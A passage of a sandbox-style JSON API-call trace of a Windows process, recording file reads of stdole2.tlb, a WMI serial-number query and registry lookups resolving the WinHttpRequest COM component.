"\\xe8\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1062 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "\\x07\\x00" }, { "name": "Length", "value": "16" } ], "repeated": 0, "id": 1063 }, { "timestamp": "2025-11-20 10:58:33,937", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": " \\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1064 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 2, "id": 1065 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "@\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1066 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00" }, { "name": "Length", "value": "16" } ], "repeated": 0, "id": 1067 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "P\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 1, "id": 1068 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "\\x01\\x00\\x00\\x00\\x88\\x00\\x00\\x80" }, { "name": "Length", "value": "8" } ], "repeated": 0, "id": 1069 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 2, "id": 1070 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x88\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1071 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00" }, { "name": "Length", "value": "24" } ], "repeated": 0, "id": 1072 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1073 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\xc8\\x04\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1074 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtReadFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "Buffer", "value": "\\x00!\\x00\\x00@:\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "Length", "value": "16" } ], "repeated": 0, "id": 1075 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000378" }, { "name": "HandleName", "value": "C:\\Windows\\System32\\stdole2.tlb" }, { "name": "FileInformationClass", "value": "5", "pretty_value": "FileStandardInformation" }, { "name": "FileInformation", "value": "\\x00 \\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1076 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000037c" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000378" }, { "name": "FileName", "value": "C:\\Windows\\System32\\stdole2.tlb" } ], "repeated": 0, "id": 1077 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000037c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02da0000" }, { "name": "SectionOffset", "value": "0x007f7e30" }, { "name": "ViewSize", "value": "0x00004000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1078 }, { "timestamp": "2025-11-20 10:58:33,953", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "WMI_Get", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "SerialNumber" }, { "name": "Value", "value": "" } ], "repeated": 0, "id": 1079 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x140084ad0", "parentcaller": "0x1400a8304", "category": "system", "api": "WMI_Get", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "SerialNumber" }, { "name": "Value", "value": "93511-284-3209639-43747" } ], "repeated": 0, "id": 1080 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1081 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000033c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 1082 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c2" }, { "name": "SubKey", "value": "WinHttp.WinHttpRequest.5.1" }, { "name": "Handle", "value": "0x0000036e" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\WinHttp.WinHttpRequest.5.1" } ], "repeated": 0, "id": 1083 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000036e" }, { "name": "SubKey", "value": "CLSID" }, { "name": "Handle", "value": "0x00000372" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID" } ], "repeated": 0, "id": 1084 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "{2087c2f4-2cef-4953-a8ab-66779b670495}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)" } ], "repeated": 0, "id": 1085 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" } ], "repeated": 0, "id": 1086 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036e" } ], "repeated": 0, "id": 1087 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020119", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom" } ], "repeated": 0, "id": 1088 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c2" }, { "name": "SubKey", "value": "WinHttp.WinHttpRequest.5.1" }, { "name": "Handle", "value": "0x0000036e" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\WinHttp.WinHttpRequest.5.1" } ], "repeated": 0, "id": 1089 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000036e" }, { "name": "SubKey", "value": "CLSID" }, { "name": "Handle", "value": "0x00000372" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID" } ], "repeated": 0, "id": 1090 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "{2087c2f4-2cef-4953-a8ab-66779b670495}" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WinHttp.WinHttpRequest.5.1\\CLSID\\(Default)" } ], "repeated": 0, "id": 1091 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" } ], "repeated": 0, "id": 1092 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036e" } ], "repeated": 0, "id": 1093 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002c6" }, { "name": "SubKey", "value": "CLSID\\{2087C2F4-2CEF-4953-A8AB-66779B670495}" }, { "name": "Handle", "value": "0x0000036e" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087C2F4-2CEF-4953-A8AB-66779B670495}" } ], "repeated": 0, "id": 1094 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 1095 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1096 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x10\\x94\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00n\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x95\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1097 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs" } ], "repeated": 0, "id": 1098 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1099 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x0000036e" }, { "name": "ObjectAttributesName", "value": "TreatAs" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\TreatAs" } ], "repeated": 0, "id": 1100 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 1101 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000036e" }, { "name": "ValueName", "value": "ActivateOnHostFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\ActivateOnHostFlags" } ], "repeated": 0, "id": 1102 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036e" }, { "name": "ValueName", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)" } ], "repeated": 0, "id": 1103 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000036e" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "WinHttpRequest Component version 5.1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\(Default)" } ], "repeated": 0, "id": 1104 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000036e" }, { "name": "SubKey", "value": "InprocServer32" }, { "name": "Handle", "value": "0x00000372" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocServer32" } ], "repeated": 0, "id": 1105 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000372" }, { "name": "ValueName", "value": "InprocServer32" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\InprocServer32" } ], "repeated": 0, "id": 1106 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" }, { "name": "ValueName", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)" } ], "repeated": 0, "id": 1107 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "%SystemRoot%\\system32\\winhttpcom.dll" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\(Default)" } ], "repeated": 1, "id": 1108 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" }, { "name": "ValueName", "value": "ThreadingModel" }, { "name": "Data", "value": "Apartment" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InProcServer32\\ThreadingModel" } ], "repeated": 0, "id": 1109 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000372" } ], "repeated": 0, "id": 1110 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 1111 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1112 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xa0\\x92\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00n\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x93\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1113 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32" } ], "repeated": 0, "id": 1114 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1115 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x0000036e" }, { "name": "ObjectAttributesName", "value": "InprocHandler32" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}\\InprocHandler32" } ], "repeated": 0, "id": 1116 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{2087c2f4-2cef-4953-a8ab-66779b670495}" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 1117 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000036e" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1118 }, { "timestamp": "2025-11-20 10:58:33,969", "thread_id": "2188", "caller": "0x14008240f", "parentcaller": "0x140089aa8", "category": "process", "api": 